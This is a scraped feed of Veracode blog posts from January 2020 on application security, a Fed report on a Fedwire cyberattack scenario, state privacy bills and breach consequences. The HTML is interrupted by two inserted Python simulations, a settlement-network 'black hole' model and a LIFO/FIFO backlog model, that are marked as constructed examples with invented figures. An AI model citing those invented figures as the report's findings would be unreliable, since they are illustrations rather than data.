Global Business Technographics® Security Survey, 2019, is especially alarming given the amount of sensitive citizen data housed by government agencies.
And, since applications are currently the most common attack vector in breaches, governments need to start investing heavily in application security (AppSec).</p> <p>For starters, government agencies need to implement prerelease scans to reduce the remediation time of security flaws. By implementing prerelease scans, like static analysis, flaws can be detected earlier in the development lifecycle. But it is not just a matter of implementing <em>occasional</em> prerelease scans. According to Veracode's <a href=""><em>State of Software Security Industry Snapshot</em></a>, government agencies currently scan 90 percent of their applications 12 times a year, which equates to only once a month. Government agencies need to formulate an AppSec program with a regular cadence of <em>frequent</em> scans. Industries that scan applications more frequently find and remediate flaws faster and, as a result, carry less security debt.</p> <p>It is also important that governments embrace DevSecOps practices. DevSecOps is a methodology that introduces collaboration between development, operations, and security. Part of the collaboration involves shifting security to the beginning of the development process. This saves time because security flaws and vulnerabilities are recognized and addressed prior to deployment. But embracing DevSecOps is not just about adding manual prerelease scans; it is about properly <em>implementing </em>prerelease tools. Here are three things to consider:</p> <ul> <li>Prepare a business case for prerelease testing of applications that is centered around citizen trust. Make the case for adopting dynamic, static, and software composition analysis based on increasing citizen trust and improving citizen experience. A data breach is a surefire way to erode citizen trust.</li> <li>Automate prerelease scans whenever possible and integrate the scans with build tools like Jenkins or ticketing tools like Jira.
Automation and integrations help you realize the benefits of AppSec tests and speed up the remediation process.</li> <li>Scan both in-house applications as well as third-party applications. If you neglect to scan third-party applications, an unidentified flaw could compromise your data and negatively affect your customer experience.</li> </ul> <p>Although government agencies are currently falling behind with these vital security measures, with the right products and a little guidance, governments can catch up in no time. Read the full <a href="">Forrester report</a> for details on the state of AppSec in government agencies.</p> Fri, 24 Jan 2020 10:56:07 -0500 (hgoslin) ver45821 Report: A Cyberattack Could Severely Disrupt the US Financial System <img src="/sites/default/files/styles/resize_960/public/2020-01/Cyberattack-Bank-Information.png?itok=YqfnZtIG" width="960" height="480" alt="" typeof="foaf:Image" /><p>A new staff report from the Federal Reserve Bank of New York highlights the risk and potential fallout that a sophisticated cyberattack might have on the United States. <a href="">In the report</a>, analysts examined a scenario in which a single-day shock hits the country's payment network, Fedwire, measuring the broad impact it would have on the economy. The results? On average, 38 percent of the network would be affected through spillovers to other banks, damaging the stability of the broader financial system in the United States.</p> <h4><strong>How an attack might unfold</strong></h4> <p>According to the analysts, this hypothetical situation would unfold swiftly. It begins with a cyberattack that allows a financial institution to continue receiving payments but prevents it from sending any payments throughout the operating day.
In this scenario, because payments are settled when Fedwire receives requests from senders, an institution's balance in the system immediately reflects incoming payments, yet the targeted financial institution is unable to send its own, causing a backup in the system. Essentially, impacted banks would become black holes that absorb liquidity without distributing any money.</p> <p>Timing matters too and can magnify the impact of an attack. "Attacks on seasonal days associated with greater payment activity are more disruptive relative to non-seasonal days, with average impacts that are about 13 percent greater," the report says. "We estimate that, on average, attacking on the worst date for a particular large institution adds an additional 25 percent in impairment relative to the case of no specific knowledge."</p> <h4><strong>The domino effect of liquidity hoarding</strong></h4> <p>An important point to consider from this analysis is that hoarding cash and forgoing payments during an attack can worsen the situation. The report explains, "We find that liquidity hoarding amplifies the network impact of the cyberattack, both increasing the average impact on the system and increasing the maximal risk." Because banks hold ample reserves, they are not necessarily attentive to daily liquidity conditions and likely will not react to these irregularities quickly. Thus, all institutions other than the one impacted will continue to make payments as usual, resulting in substantial interruptions in the network.</p> <p>It's a domino effect that could shake up the whole system. Analysts uncovered a correlation of over 80 percent between assets and payments, finding that a smaller subset of banks plays a vital role in markets like equity and Treasury.
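The mechanics described above, rendered as a small constructed simulation. This is an added example, not the New York Fed's model: the six hypothetical banks, their opening reserves and their payment instructions are made up for illustration. One bank can receive but not send, the other banks retry their payments through the day, and we count how many banks end the day unable to settle what they owe, first when everyone keeps paying and then when banks hoard reserves above a floor.

```python
"""Toy settlement-network model of the "black hole" scenario.

Constructed example (not the New York Fed's model): six hypothetical
banks send each other payments from their reserve balances over one
day.  Payments are processed in order and retried for a few rounds.
A bank under attack can receive but never send; a hoarding bank
refuses any payment that would push its reserves below a floor.
A bank counts as impaired if it ends the day with outgoing payments
it could not settle.
"""

# Constructed opening reserves and one day's payment instructions
# (sender, receiver, amount).  Bank A is the hub the attack hits.
OPENING = {"A": 50, "B": 10, "C": 10, "D": 10, "E": 35, "F": 40}
PAYMENTS = [
    ("A", "E", 30),  # fails under attack: A cannot send
    ("E", "B", 30),  # E can cover this only from A's payment or its own cushion
    ("B", "C", 30),
    ("C", "D", 30),
    ("D", "A", 30),  # liquidity flows back into the attacked bank and stays there
    ("A", "B", 10),  # fails under attack
    ("F", "C", 10),  # F has no exposure to A at all
    ("C", "F", 10),
]


def settle_day(opening, payments, attacked=None, hoard_floor=0, rounds=3):
    """Run one day of settlement; return (balances, unsettled payments)."""
    balances = dict(opening)
    pending = list(payments)
    for _ in range(rounds):
        still_pending = []
        for src, dst, amt in pending:
            # The attacked bank cannot submit payments at all.  With
            # hoard_floor=0 a bank pays whenever it has the funds; a higher
            # floor makes it hoard reserves above that level.
            if src == attacked or balances[src] - amt < hoard_floor:
                still_pending.append((src, dst, amt))
                continue
            balances[src] -= amt
            balances[dst] += amt
        pending = still_pending
        if not pending:
            break
    return balances, pending


def impaired_fraction(opening, payments, attacked=None, hoard_floor=0):
    """Share of banks left with unsettled outgoing payments at end of day."""
    _, pending = settle_day(opening, payments, attacked, hoard_floor)
    impaired = {src for src, _, _ in pending}
    return len(impaired) / len(opening)


if __name__ == "__main__":
    for label, attacked, floor in [
        ("normal day", None, 0),
        ("attack on A, everyone keeps paying", "A", 0),
        ("attack on A, banks hoard above 10", "A", 10),
    ]:
        share = impaired_fraction(OPENING, PAYMENTS, attacked, floor)
        print(f"{label}: {share:.0%} of banks impaired")
```

On a normal day every payment settles. Once A stops sending, the 30 that D pays into A never comes back out, so A alone is impaired (1 of 6). Add hoarding and E refuses to pay B because that would drop it below its floor, B therefore cannot pay C, and the whole ring stalls (5 of 6), which is the amplification the report describes.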
A cyberattack on a single institution could impede the day-to-day functions of the payment network and cause quite a headache that extends beyond the impacted institutions, reaching into the economy.</p> <p>Failing to respond to these issues strategically as they unfold can lead to that previously mentioned black hole of liquidity. This problem may be worsened if financial institutions use the same third-party service providers, which offers less incentive for banks to monitor activity and spot abnormalities that can cause liquidity interruptions.</p> <h4><strong>Strengthening security for financial institutions</strong></h4> <p>Considering the above scenario, data from our most recent <a href=""><em>State of Software Security</em> report</a> (SOSS) indicates that the financial industry has some work to do to shore up its application security. The figures reveal that, in the financial industry specifically, the median time to remediate security flaws in code (MedianTTR) is 67 days, which is higher than nearly every other industry we measured. Information leakage also has a high prevalence at 66 percent as opposed to 63 percent across all industries.</p> <p>Our data uncovers best practices that are dramatically improving remediation times and reducing overall <a href="">security debt</a>. 
The analysis for this year's report found that when organizations scan their applications for security more than 260 times per year, their median fix time drops from 68 days to 19 days, a 72 percent reduction.</p> <p>Get more details on the application security trends and best practices in the full <a href="//">SOSS report</a>.</p> <p>&nbsp;</p> Tue, 21 Jan 2020 10:25:38 -0500 (mmcbee) ver45856 2020 Trend Alert: Consumer Privacy <img src="/sites/default/files/styles/resize_960/public/consumer%20privacy-min.png?itok=YjigXary" width="960" height="480" alt="Consumer privacy " typeof="foaf:Image" /><p>We are only a few weeks into 2020, and it is safe to say that consumer privacy is <em>all the rage</em>. California kicked off the movement with the California Consumer Privacy Act (CCPA), AB 375, which went into effect on January 1, 2020. The act aims to give consumers more rights over their personal data. Since then, Washington, New Hampshire, and New York have all proposed similar consumer privacy bills that, if passed, will have an effect not only on consumers, but also on businesses that operate in these states.</p> <p>Take a look at the bills, then consider the steps your business can take to help comply with the regulations.</p> <h4><strong>California Consumer Privacy Act </strong></h4> <p>The <a href="">newly established rights</a> allow consumers to request records of what personal data is collected and to demand the deletion of that information or a halt to its sale.
The privacy act also regulates the data collected from minors and prevents businesses from discriminating against consumers who choose to exercise their rights.</p> <p>Businesses that must adhere to the CCPA are those that collect personal data, conduct business in California, and fit into one or more of the following categories:</p> <ul> <li>Gross annual revenue over $25 million</li> <li>Buys, sells, or obtains the personal data of more than 50,000 consumers, devices, or households</li> <li>Makes over 50 percent of its revenue from selling consumers' data.&nbsp;</li> </ul> <p>To further empower consumers, CCPA has also mandated that data brokers register with the Attorney General, providing information about who they are and what their collection practices entail. This information is loaded into a database that is accessible to all consumers.&nbsp;</p> <h4><strong>Washington Privacy Act </strong></h4> <p>On January 13, 2020, Washington State Senator Reuven Carlyle introduced the bill for the <a href="">Washington Privacy Act</a> (WPA), SB 5376. If passed, the bill will allow residents to see who is accessing their personal data, correct or delete data, or opt out of targeted advertisements and profiling. Controllers will need to conduct data protection assessments of where they are processing personal data, and additional assessments any time there is a change to the processing that could affect consumers. The bill will also require companies to disclose data management policies to increase transparency, and it establishes limits on the use of facial recognition technology.</p> <h4><strong>New Hampshire Privacy Act </strong></h4> <p>New Hampshire State Representatives Garrett Muscatel and Greg Indruk reintroduced the bill for the <a href=";txtFormat=html&amp;sy=2020">Act Relative to the Collection of Personal Information by Businesses</a>, HB 1680, to the New Hampshire House of Representatives.
The bill, if passed, will give consumers the right to access, transfer, and delete their personal information, or to deny the sale of such information. It will also give consumers the right to take action if their information is leaked. Like CCPA, the bill would apply to any legal entity that has annual gross revenues over $25,000,000, processes data of more than 50,000 New Hampshire consumers, or derives 50 percent of its revenue from selling personal information.</p> <h4><strong>New York Privacy Act</strong></h4> <p>The <a href="">New York Privacy Act</a>, SB 5642, was sent to the Senate Standing Committee on Consumer Protection on January 8, 2020. If approved, the bill will improve transparency, add protections, and allow consumers to take action regarding the handling of their personal data. Personal data will include biometric information and internet or electronic network activity.</p> <h4><strong>What steps can you take to protect your clients and your business? </strong></h4> <p>These regulations, and others like the EU GDPR, signal that protecting and securing consumer data will increasingly be required, and application security plays a role in that requirement. Whether you are looking to expand your application security (AppSec) program to further comply with the new regulations, or you are looking to start your first AppSec program, we can help.
Our <a href="//">Veracode Verified</a> program gives you a clear AppSec roadmap to follow, helping to ensure that security is woven into your development process.</p> <p>In addition, by participating in the program, you can earn a Veracode Verified seal, which demonstrates to customers that you are dedicated to securing your applications and protecting their personal data.</p> <p><a href="">Contact us today</a> to learn how to better secure your applications to comply with industry standards.</p> Fri, 17 Jan 2020 00:00:00 -0500 (hgoslin) ver45741 State of Software Security v10: 5 Key Takeaways for Developers <img src="/sites/default/files/styles/resize_960/public/SOSS%20X%20Developer%20Takeaways.png?itok=SmY8KPRp" width="960" height="480" typeof="foaf:Image" /><p>In case you missed it, this year we launched our 10<sup>th</sup> annual <a href="//"><em>State of Software Security</em></a> (SOSS X) report! Armed with a decade of data, the Veracode team analyzed 85,000 applications to study trends in fix rates, mounting security debt, shifts in vulnerability by language, and more.</p> <p>What did we uncover? At the core of our research, we found there's still a need for better remediation processes and more frequent security scans. But we also uncovered some best practices that are leading to significant application security improvements. Read on for a snapshot of key takeaways that can help set you and your organization up for AppSec success in 2020.</p> <h4><strong>Most apps still don't pass crucial compliance tests </strong></h4> <p><a href="//">OWASP Top 10</a> vulnerabilities and <a href="">SANS 25</a> software errors represent consensus listings of the most critical flaws in the industry, and while we've seen some changes in compliance rates across past editions of our SOSS report, the 10-year trend shows us that things haven't shifted much as of late.
Today, 68 percent of apps fail to pass OWASP on initial scan (down from 77 percent in volume one of SOSS), and 67 percent of apps fail to pass SANS on initial scan, the same figure in volume one and volume ten.</p> <p>The fact that these common and serious vulnerabilities are still prevalent in code underscores the fact that we are not creating environments where developers can code securely. The absence of proper secure coding training, as well as the lack of access to the right tools, is clearly creating risk.</p> <h4><strong>Android, PHP, iOS, and C++ have a high frequency of flaws</strong></h4> <p>This year's data analysis found that over 90 percent of Android, PHP, and iOS applications contain security flaws on initial scan. Ranking over 80 percent were C++, .NET, and Java, while Python and JavaScript came in with the lowest flaw rates.</p> <p> <div class="media media-element-container media-default"> <div id="file-25381" class="file file-image"> <div class="content"> <img style="" alt="Language Scans" title="Language Scans" class="media-element file-media-responsive media-wysiwyg-align-center" src="//" height="377" width="725"> </div> </div> </div></p> <p>Why do we see a higher rate of flaws in mobile languages? Perhaps the reason Android and iOS are two of the top offenders is that many mobile applications aren't properly scanned before they're uploaded to the Apple App Store and the Google Play Store.&nbsp;Ben&nbsp;Greenwald, Director of Software Engineering at Veracode, explains further:&nbsp;</p> <p>"One reason Android and iOS applications may tend to have more security flaws on first scan is because mobile developers believe they are already covered.
Developers might assume that Apple and Google thoroughly test apps before they're released, or they rely on Apple and Google for testing under the assumption that a security infrastructure is already in place."</p> <p>This issue only further highlights the need for thorough internal and third-party testing processes to ensure that your applications are secure.</p> <p>Language also adds yet another layer to the issue of unfixed flaws piling up on developer plates; the average security debt for PHP and C++ is massive compared to that of .NET, Android, Java, and JavaScript.</p> <p> <div class="media media-element-container media-default"> <div id="file-25386" class="file file-image"> <div class="content"> <img style="" alt="Language Flaw Debt" title="Language Flaw Debt" class="media-element file-media-responsive media-wysiwyg-align-center" src="//" height="687" width="1220"> </div> </div> </div></p> <p>As two of the top languages for flaw rates, it makes sense that unchecked issues in PHP and C++ can spin out of control for development teams. So, what's their deal? PHP's start in the mid 90s came with a basic design that works well for smaller applications and beginners learning to code, but it has since been so widely adopted and stretched beyond its means that it is left highly prone to flaws.</p> <p>C++ is an incredibly robust language that powers many of the operating systems, browsers, and productivity apps that we use in our daily life. But with that great power comes the great responsibility to manage memory manually, guard against use-after-free, and keep stack buffers from overflowing.
These flaws tend to accumulate over time and are easier to introduce than in many of today's more commonly used higher-level languages.</p> <p>While some applications are prone to debt buildup because they use multiple languages or a basic flaw-heavy language like PHP, it's important to consider the steps your team can take to counterbalance the prevalence of flaws, like reprioritization.&nbsp;</p> <h4><strong>Remediation priorities are misaligned for top vulnerabilities</strong></h4> <p>Out of the 85,000 applications tested (including 1.4 million individual scans), our data shows that 83 percent of apps have at least one flaw when they're initially scanned. That's an 11 percent increase from volume one to volume ten of the SOSS report, but the good news is we also saw an overall 14 percent decrease in applications with high-severity flaws.</p> <p>The bad news? Focus is, it seems, not always placed on fixing the right flaws. For example, we found that A10-Logging is ranked the lowest in flaw prevalence but is at the top of the list for fix rate, the bottom of the list for incidents, and doesn't rank for exploit risk. A5-Access Control is another mystifying trend. It ranks low in prevalence but towards the top of the exploit and incident rankings, falling right in the middle of the list for fix rate.</p> <p>Some flaws and fixes are consistent, though. Both A1-Injection and A2-Authentication sit toward the top of the list across the board, while A8-Deserialization is reliably stable in the bottom half of each category.
This discrepancy sheds some light on which flaws are neglected, deferred, targeted, and prioritized, and on how DevOps teams can rank issues more efficiently.</p> <p>Flaws that can be fixed quickly in a small scope naturally get resolved ahead of ones that look more complicated, yet the severe issues are often no harder to fix, which underscores the need for a more deliberate plan of attack.</p> <h4><strong>Developers favor recency, adding to security debt</strong></h4> <p>SOSS X shows us that developers typically follow a LIFO (Last In, First Out) method instead of a FIFO (First In, First Out) approach. With LIFO, developers run the risk of contributing to security debt when older flaws are stacked underneath newer issues. As time goes by, the probability of remediation drops significantly, and any unmitigated remnants slide into the land of security debt.</p> <p>This trend highlights an ongoing battle with security debt across the industry and draws attention to how it muddies the waters of remediation. Fortunately, we have revealing data on scanning cadence that can help reduce an organization's debt over time.</p> <h4><strong>Bursty scans contribute to security debt, but it's reversible</strong></h4> <p>We mention <a href="">security debt</a> throughout the SOSS X report (and this post) because it can leave organizations vulnerable to attacks through the backlog of flaws, and slower to mitigate issues that arise out of the blue.</p> <p>The good news is, this year we also uncovered evidence of practices that are chipping away at security debt. It's all about scanning frequency. We know that "bursty" scanning cadences result in a higher prevalence of flaws over time, as opposed to steady and early scan processes with fewer flaws open at once.
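To see why LIFO flatters fix-time metrics while quietly building debt, here is an added example that is not drawn from the SOSS data set: the daily arrival and fix rates are constructed, and the model replays a year of a backlog under both orderings, then compares the median age at which flaws get fixed with the age of what is still open.

```python
"""Simulate a remediation backlog worked LIFO versus FIFO.

Constructed model (not the SOSS data set): every day a fixed number of
new flaws are found and the team can close fewer than that, so a
backlog builds.  Under LIFO the newest flaws are fixed first; under
FIFO the oldest.  The report compares the median age at which flaws
get fixed with the age of what is left open, i.e. the security debt.
"""
from collections import deque


def simulate(days, found_per_day, fixed_per_day, order):
    """Return (ages of flaws still open at the end, ages at which flaws were fixed)."""
    backlog = deque()  # the day on which each open flaw was found
    fixed_ages = []
    for day in range(days):
        backlog.extend([day] * found_per_day)
        for _ in range(min(fixed_per_day, len(backlog))):
            # LIFO takes the most recently found flaw, FIFO the oldest one
            found = backlog.pop() if order == "lifo" else backlog.popleft()
            fixed_ages.append(day - found)
    last_day = days - 1
    return [last_day - found for found in backlog], fixed_ages


def debt_report(order, days=365, found_per_day=3, fixed_per_day=2, debt_age=90):
    """Summarise the backlog; open flaws older than debt_age count as security debt."""
    open_ages, fixed_ages = simulate(days, found_per_day, fixed_per_day, order)
    return {
        "open": len(open_ages),
        "debt": sum(1 for age in open_ages if age > debt_age),
        "oldest_open_age": max(open_ages) if open_ages else 0,
        "median_fix_age": sorted(fixed_ages)[len(fixed_ages) // 2] if fixed_ages else 0,
    }


if __name__ == "__main__":
    for order in ("lifo", "fifo"):
        print(order.upper(), debt_report(order))
```

Both orderings leave the same number of flaws open, because the team closes the same number either way. LIFO reports a median fix age of zero days, since it only ever touches what was found today, while the flaw left over each day is never revisited and the debt older than 90 days grows to 274 items, the oldest a year old. FIFO reports a median fix age of 61 days, which looks worse on a dashboard, but nothing waits longer than about four months and the 90-day debt is a third of the LIFO figure.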
Sometimes bursty scanning simply fits your waterfall development cycle or pairs with testing schedules that are event-driven, but this can leave security holes where flaws are missed month to month.</p> <p> <div class="media media-element-container media-default"> <div id="file-25391" class="file file-image"> <div class="content"> <img style="" alt="Bursty Scans" title="Bursty Scans" class="media-element file-media-responsive media-wysiwyg-align-center" src="//" height="446" width="1220"> </div> </div> </div></p> <p>Based on our data, we know that development teams can improve their median time to remediation (MedianTTR) by about 70 percent with established procedures and consistent testing schedules. Automating your processes to increase scanning tempo and improve prioritization reduces the security debt that your organization carries.</p> <h4><strong>Read the report</strong></h4> <p>Want to see all this data in one complete package? Read the <a href="//">full SOSS report</a> to learn more about the state of DevSecOps, discover additional data highlights by industry, and more.</p> Mon, 13 Jan 2020 09:38:25 -0500 (mmcbee) ver45611 The Consequences of Security Breaches Are Becoming More Severe <img src="/sites/default/files/styles/resize_960/public/Job%20Security.png?itok=tXq2j6GI" width="960" height="480" typeof="foaf:Image" /><p>With the prevalence of cyberattacks, breaches, and data leaks heading into 2020, it's becoming commonplace for employees to part ways with their organization after a security incident. Although the consequences of a breach were less severe in the past, reactions are shifting as data leaks are deemed more dire than ever before.</p> <p>A 2018 report from <a href="">Kaspersky Lab</a> surveyed 6,000 people in 29 countries and found that, globally, 31 percent of cybersecurity incidents resulted in the layoff of employees at impacted companies.
In roughly a third of those cases, the employees let go after the breach or security incident held senior IT positions.</p> <p>The results from Kaspersky's survey also revealed that 32 percent of C-level managers and CEOs in the United States were laid off post-breach. That number is lower in other countries but still higher overall than for most functional roles within and outside of IT, representing a growing trend in how organizations respond to breach backlash. As cybersecurity professionals are in high demand and C-level managers <a href="//">cost a pretty penny</a>, the decision to part ways is not always easy.</p> <h4><strong>Weathering the post-breach storm</strong></h4> <p>With great power comes great responsibility. Jun Ying, the former CIO of Equifax U.S. Information Solutions, was <a href="">sent to jail</a> and fined $55,000 for insider trading after it was discovered that he had traded on knowledge of the company's 2017 breach before it was made public. In 2017, Uber's CSO Joe Sullivan was let go after he allegedly helped <a href="">cover up</a> a bug bounty pay-out of over $100,000, paying attackers in exchange for the deletion of stolen data on 57 million drivers and passengers. Both Sullivan and security lawyer Craig Clark were fired from the company.</p> <p>Sometimes privacy-minded employees clash with their own organization's policies, and the clash can eliminate a role altogether. For example, Facebook's former CSO, Alex Stamos, left his security role at the social media powerhouse after he allegedly disagreed with how Facebook handled the very public Cambridge Analytica scandal. In 2018, Facebook made the decision <a href="">not to replace Stamos</a> and to instead rely on embedding security engineers, analysts, investigators, and other specialists in its engineering and product teams.
It was a testament to how fast things can change within an organization's security team.</p> <p>In other situations, ex-employees can cause unanticipated headaches with ripple effects of their own. Capital One <a href="">fell prey</a> to cyberattacker Paige Thompson when she infiltrated the company's third-party cloud server and accessed 106 million customer records in 2019. Thompson, previously an Amazon Web Services software engineer, allegedly built a scanning tool that looked for misconfigured cloud servers on the web that exposed credentials.</p> <p>These examples lead to a logical question: if your business is unable to fortify its internal processes and protect sensitive information, is it trustworthy to consumers? With a solid plan for security and remediation in place, the risk of job loss and consumer distrust diminishes.</p> <h4><strong>Getting serious about your security </strong></h4> <p>As breaches and cyberattacks lead to high-profile firings that play out in the media, the public is paying attention. A recent <a href="">IDG Survey Report</a>, <em>Security as a Competitive Advantage</em>, found that 66 percent of respondents are more likely to work with a vendor whose application security has been validated by an established, independent expert.</p> <p>Additionally, 99 percent of those surveyed for the report welcome the advantages of working with a certified and secure vendor, such as improved protection of IP and data that gives their customers peace of mind.
There are measures your organization can take to boost customer confidence, give you a competitive advantage, and potentially prevent losses (monetary or otherwise) from a breach or cyberattack.</p> <p>In addition to incorporating security testing into your software development, third-party validation of your security efforts shows prospects and customers alike that securing data is a top priority in your organization's application development process.</p> <p>Independent security validation comes with a number of benefits, enabling vendors to:</p> <ul> <li>Proactively address any questions a prospect might have about security</li> <li>Instill confidence in buyers that they're choosing a vendor who cares about their data</li> <li>Speed up sales cycles by eliminating the need for back-and-forth validation</li> <li>Stay one step ahead of security concerns from customers and prospects</li> <li>Integrate more efficiently with development teams to improve security</li> </ul> <p>With third-party validation in place, you not only have proof positive that your organization cares about security, but also a roadmap for maturing your application security program. The risk of losing employees to high-profile incidents also diminishes. Eliminating concern and doubt sets you apart with a competitive advantage in the marketplace that sends a clear message to buyers: you're serious about security.&nbsp;&nbsp;</p> <p><a href="//">Learn how</a> the Veracode Verified program can help position you as a trusted and secure vendor so that you're ready when a prospect comes calling.</p> Fri, 10 Jan 2020 11:49:23 -0500 (mmcbee) ver45601 Did You Read Our Most Popular 2019 Blog Posts? <img src="/sites/default/files/styles/resize_960/public/top_2019_blogs.png?itok=ydUbJRtT" width="960" height="480" typeof="foaf:Image" /><p>What were your biggest AppSec questions and concerns in 2019? Want to find out what others' were?
Every January, we look at the most-read blog posts from the previous year, and it always proves to be a valuable exercise for us, and we hope for you as well. The posts below were favorites among our readers in 2019 and highlight the software security issues that were top of mind. Their popularity could also stem from the very practical advice they contain; we got the message: look for more of the same in 2020!</h4 style="x"><h4><strong>Detailed information on vulnerabilities and exploits, and how to prevent and avoid them</strong></h4> <p>The blog posts below contain detailed explanations of vulnerabilities and exploits from our own research team and penetration testers. Clearly, there is an appetite for a first-hand, closer look at how developers are creating vulnerabilities, and how attackers are exploiting them.</p> <p><a href="//">Exploiting Spring Boot Actuators</a></p> <p><a href="//">Exploiting JNDI Injections in Java</a></p> <p><a href="//">Data Extraction to Command Execution CSV Injection</a></p> <p><a href="//">The Top Five Web Application Authentication Vulnerabilities We Find</a></p> <h4><strong>Managing open source risk</strong></h4> <p>As in the past several years, blog posts on open source risk, and how Veracode helps to reduce it, landed in the top 10.</p> <p><a href="//">Introducing New Veracode Software Composition Analysis</a></p> <p><a href="//">How Veracode Scans Docker Containers for Open Source Vulnerabilities</a></p> <h4><strong>Complying with AppSec regulations</strong></h4> <p>As major data breaches continue to expose customers' sensitive data and cause major monetary and reputational damage to organizations, regulators are taking notice. From the <a href="">EU General Data Protection Regulation</a> (EU GDPR) to the <a href="">NY State Department of Financial Services (NY DFS) Cybersecurity Regulations</a>, more regulations are including application security requirements, and complying with them is becoming a major driver for security professionals.
In turn, two blog posts about cybersecurity regulations were featured on the most-read list for 2019.</p> <p><a href="//">PCI Releases Software Security Framework</a></p> <p><a href="//">Ohio Senate Bill 220 Incentivizes Businesses to Maintain Higher Levels of Cybersecurity</a></p> <h4><strong>Subscribe to our content</strong></h4> <p>Did you miss any of these posts last year? Don't miss a thing in 2020; <a href="">subscribe to our content</a>.</p> Thu, 09 Jan 2020 10:34:29 -0500 (sciccone) ver45586 Work in Healthcare? This is Why You Should Give Your Security a Checkup <img src="/sites/default/files/styles/resize_960/public/Healthcare%20Security.png?itok=rvwg-bZD" width="960" height="480" typeof="foaf:Image" /><p>Most patients practice preventative care through regular trips to the doctor, catching minor issues before they turn into major medical problems. So, why don't more organizations follow suit with security testing to prevent breaches and fortify the safety of patient information?</p> <p>Too often, remediation is an afterthought as developers scramble to patch holes in their systems post-breach. A recent report in the journal Health Services Research suggests that this herculean effort can put a strain on patient health when things slow down after a breach and new security measures are introduced. However, preventative care can work in the security world just as it does for your health.</p> <h4><strong>Less isn't more in healthcare cybersecurity</strong></h4> <p>Some experts and industry thought leaders see unfortunate breaches as opportunities to better understand what went wrong and how it can be prevented in the future.
Unfortunately, information from these breaches sometimes muddies the tumultuous waters of cybersecurity and can cause panic over increased security procedures.</p> <p>Josephine Wolff, assistant professor of cybersecurity policy at Tufts Fletcher School of Law and Diplomacy, found that the 2019 report published in the journal Health Services Research draws dangerous conclusions about the negative impacts of mitigating cyberattacks in healthcare. The <a href="">HSR paper</a> proposes that lost passwords and associated security measures, like two-factor authentication, hold up patient care with increased wait times for ECGs and result in higher rates of fatal heart attacks, a point that, the authors suggest, should lead to less aggressive security efforts.</p> <p>In her <a href="">article</a>, Wolff proposes that a slower remediation process is <em>precisely</em> why more medical institutions should view this as a crucial pivot point, not a nuisance. She explains, "Undoubtedly, IT upgrades and updates can inconvenience workers and slow down operations in any workplace, but that is a reason to develop techniques and processes for implementing them more smoothly, not to write them off as harmful and counterproductive." Even the most basic preventive actions are crucial best practices, and they're just a starting point.</p> <h4><strong>The cyberattack epidemic in healthcare</strong></h4> <p>Data from the last decade shows just how damaging breaches can be for institutions and patients alike. According to <a href="">HIPAA Journal</a>, there were 2,546 healthcare breaches from 2009 to 2018 that exposed over 180,000,000 patient records to attackers, resulting in costly settlements and fines for HIPAA violations. 
Additionally, figures from the <a href="">Protenus 2019 Breach Barometer</a> report reveal that in 2018 alone, the healthcare sector saw a whopping 15,085,302 patient records breached, a number that nearly tripled from 2017 to 2018.&nbsp;</p> <p>These trends are alarming but important to watch. Our 10<sup>th</sup> annual <a href="//">State of Software Security (SOSS) report</a> examines trends in various industries, <a href="">including healthcare</a>, and the data sheds some light on why it's so crucial for organizations to get a jump on security measures.&nbsp;</p> <p> <div class="media media-element-container media-default"> <div id="file-25281" class="file file-image"> <div class="content"> <img style="" alt="Healthcare Security Rank" title="Healthcare Security Rank" class="media-element file-media-responsive media-wysiwyg-align-center" src="//" height="263" width="738"> </div> </div> </div></p> <p>We found that healthcare institutions have the highest prevalence of severe flaws at 52 percent and are the slowest to fix said flaws, with a median time-to-remediation (MedianTTR) of 131 days. All this typically contributes to <a href="">security debt</a>, which accumulates over time as more and more flaws are left uncorrected.</p> <p>Daunting security debt is a problem that your DevOps team can tackle with the right processes in place, including a steady cadence of scans. Our SOSS report found that those who conduct up to 12 scans per year have a MedianTTR of 68 days, while those who scan more than 260 times per year have a MedianTTR of just 19 days (that's a substantial 72 percent reduction in remediation time).</p> <p>Increasing the regularity of your scans can have a lasting impact on security debt. In fact, we found that frequent scanners carry 5x less security debt than sporadic scanners who lack a reliable testing process. 
The remedy is clear: scanning often and speeding up fix rates to mitigate severe flaws will cause far fewer headaches in the future and, ultimately, prevent downtrends in patient care.</p> <h4><strong>A process-minded prognosis</strong></h4> <p>The good news in this year's SOSS report is that healthcare institutions have a fix rate of 72 percent, which is decent when compared to other industries. Still, hospitals and healthcare providers must stay on top of application scanning to increase frequency and efficiency, cutting down their MedianTTR.</p> <p>The solution? Shifting DevSecOps behaviors from reactive to proactive through keener code management and more thorough remediation processes. This entails making sure security programs:</p> <ul> <li>Include a trained team of security-minded developers</li> <li>Cover all applications across your health organization</li> <li>Include a frequent and steady scanning cadence</li> <li>Have ample resources developers can tap into for testing and fixes</li> <li>Are adaptable enough to handle shifting landscapes in cybersecurity</li> <li>Are equipped to cover third-party vendors used by the organization</li> </ul> <p>Taking steps towards a well-rounded security program not only bolsters your defense against attacks but also sheds light on wrinkles in your remediation process that need ironing. With these measures in place, if a breach or a cyberattack occurs, your healthcare organization will be better equipped to handle issues with minimal to no impact on patient care.</p> <h4><strong>Learn more about cybersecurity in healthcare</strong></h4> <p>Like what you see? 
Find more info about the state of cybersecurity for healthcare by downloading <a href="">our SOSS Volume 10 Industry Snapshot</a>, and then check out <a href="//">the full report</a> to keep a pulse on the shifts in DevSecOps over the last ten years.&nbsp;</p> Wed, 08 Jan 2020 15:16:57 -0500 (mmcbee) ver45551 Veracode CEO Sam King Recognized in WomenInc. Magazine’s 2019 Top Influential Corporate Directors <img src="/sites/default/files/styles/resize_960/public/SamKing_honored_corporate_director-min.png?itok=Locy6rrN" width="960" height="480" typeof="foaf:Image" /><p>We're thrilled to announce that Veracode Chief Executive Officer Sam King has been named one of <em>WomenInc</em>. Magazine's 2019 Most Influential Corporate Directors!</p> <p>Honoring influencers, achievers, and executives, this announcement recognizes women who are making notable contributions to the world of business and technology. The list compiled by <em>WomenInc</em>. Magazine includes over 700 directors serving on the boards of S&amp;P 1000/Mid-Cap publicly held companies.</p> <p>To celebrate these accomplished leaders, <em>WomenInc</em>. maintains an exclusive <a href="">online directory</a> of honorees and publishes their yearly announcement in seasonal editions of the magazine.</p> <p>King is recognized for her contributions on behalf of Progress Software, the leading provider of application development and digital experience technologies. Since joining the Board of Directors in February 2018, she has contributed to the implementation of Progress' business strategy as well as its charter to operate as a socially responsible organization.</p> <p>She is also a well-known expert in cybersecurity and is a founding member of the Veracode team. She helped lead the establishment and evolution of the application security category alongside industry experts and analysts. 
